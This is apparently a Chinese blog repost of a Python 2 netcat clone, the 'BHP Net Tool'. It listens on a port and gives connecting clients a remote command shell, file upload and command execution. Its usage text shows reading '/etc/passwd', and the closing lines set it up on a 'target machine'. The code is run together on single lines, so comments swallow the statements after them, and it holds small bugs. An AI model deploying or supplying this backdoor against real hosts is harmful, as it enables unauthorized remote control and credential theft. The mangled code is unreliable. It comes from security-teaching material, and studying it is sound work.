仿netcat,手写tcp通道,创建监听拥有命令行权限!
来源:互联网 发布:伊藤润二坏小孩知乎 编辑:程序博客网 时间:2024/04/30 02:35
# -*- coding: utf-8 -*-__author__ = 'wangjingyao'import sysimport socketimport getoptimport threadingimport subprocess#定义一些全局变量listen = Falsecommand = Falseupload = Falseexecute = ""target = ""upload_destination = ""port = 0# 说明文档def usage(): print "BHP Net Tool" print print "Usage: bhpnet.py -t target_host -p port" print "-l --listen -listen on [host]:[port] for incoming connections" print "-e --execute =file_to_run -execute the given file upon receiving a connection" print "-c --command - initialize a command shell" print " -u --upload = destination -upon receiving connection upload a file an write to [destination]" print print print "Example :" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe" print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e =\"cat /etc/passwd\"" print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168..11.12 -p 135" sys.exit(0)def run_command(command): #换行 command=command.rstrip() print "---------------command",command #运行命令行并将输出返回 try: output=subprocess.check_output(command,stderr=subprocess.STDOUT,shell=True) except: output+"Failed to execute command.\r\n" # 将数据发送 return output#实现文件上传,命令执行,shell相关功能def client_handler(client_socket): global upload global execute global command #测试上传文件 if len(upload_destination): #读取所有的字符并写下目标 file_buffer="" #持续读取数据直到没有符合的数据 while True: data = client_socket.recv(1024) if not data: break else: file_buffer+=data #现在我们接收这些数据并将它们写出来 try: file_descriptor = open(upload_destination,"wb") file_descriptor.write(file_buffer) file_descriptor.close() #确认文件已经写出来 client_socket.send("Successfully saved file to %s\r\n" % upload_destination) except: client_socket.send("Failed to save file to %s\r\n" % upload_destination) #检查命令执行 if len(execute): #运行命令 output = run_command(execute) client_socket.send(output) #如果需要一个命令行shell,那么我们进入另一个循环 if command: while True: #跳出一个窗口 client_socket.send("<BHP:#> ") #现在我们接受文件知道发现换行符 cmd_buffer="" while "\n" not in cmd_buffer: cmd_buffer+=client_socket.recv(1024) #返还命令输出 response=run_command(cmd_buffer) #返回相应数据 client_socket.send(response)# 服务器端主循环和子函数def server_loop(): global target #如果没有定义目标,那么我们监听所有的接口 if not len(target): target="0.0.0.0" server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) print target,port server.bind((target,port)) server.listen(5) while True: client_socket,addr=server.accept() #分拆一个线程处理新的客户端 client_thread=threading.Thread(target=client_handler,args=(client_socket,)) client_thread.start()def client_sender(buffer): client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: # 链接到目标主机 client.connect((target,port)) if len(buffer): client.send(buffer) while True: # 现在等待数据回传 recv_len =1 response="" while recv_len: data = client.recv(4096) recv_len=len(data) response+=data if recv_len<4096: break print response, # 等待更多的输入 buffer=raw_input("") buffer+="\n" # 发送出去 client.send(buffer) except: print "[*] Exception Exiting." #关闭链接 client.close()# 创建主函数处理命令行参数和调用我们编写的其他函数def main(): global listen global port global execute global command global upload_destination global target if not len(sys.argv[1:]): usage() # 读取命令行选项 try: opts,args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"]) except getopt.GetoptError as err: print str(err) usage() for o,a in opts: if o in ("-h","--help"): usage() elif o in ("-l","--listen"): listen =True elif o in ("-e","--execute"): execute =a elif o in ("-c","--commandshell"): command=True elif o in ("-u","--upload"): upload_destination =a elif o in ("-t","--target"): target=a elif o in ("-p","--port"): port=int(a) else: assert False,"Unhadled Option" # 我们是进行监听还是仅从标准输入发送数据 if not listen and len(target) and port > 0: # 从命令行读取内存数据 # 这里将阻塞,所以不再向标准输入发送数据时发送 CTRL-D buffer = sys.stdin.read() # 发送数据 client_sender(buffer) #我们开始监听并准备上传文件,执行命令,放置一个反弹shell,取决于上面的命令行选项 if listen: server_loop()main()
目标靶机:windows cmd : python bhpnet.py -l -t 192.168.180.XXX -p 9999 -c
客户端: windows cmd: python bhpnet.py -t 192.168.180.XXX -p 9999
0 0
- 仿netcat,手写tcp通道,创建监听拥有命令行权限!
- Netcat:TCP/IP瑞士军刀
- 手写TCP
- 如何快速创建拥有全部权限的SAP用户
- 仿“米聊”手写功能
- https简介以及仿https的加密tcp安全通道的简要设计思路
- 如何使MSN7.0拥有手写功能?
- TCP tunnel (port forwarding) using Netcat
- netcat简易版 加 tcp代理!
- SparkStreaming之TCP流式处理(netcat)
- netcat
- NetCat
- NetCat
- netcat
- netcat
- netcat
- MUD游戏编程 创建TCP监听套接字
- 如果希望监听TCP端口9000,应该怎样创建socket?
- java标识符和关键字
- SQL*Loader的使用总结(四)
- 自定义控件三部曲之动画篇(七)——ObjectAnimator基本使用
- HDOJ 1091 A+B for Input-Output Practice (IV)
- 基于阿里云从日PV400到150w网站服务器升级记
- 仿netcat,手写tcp通道,创建监听拥有命令行权限!
- HDOJ 1093 A+B for Input-Output Practice (V)
- 二维码 界面定制
- Thread-Local Variables线程局部变量
- 怎么写一个“完美”的单例模式
- asp.net服务器控件button先执行js再执行后台的方法
- HDOJ 1094 A+B for Input-Output Practice (VII)
- Spring注解@Component、@Repository、@Service、@Controller区别
- 深入字节码 -- 使用 ASM 实现 AOP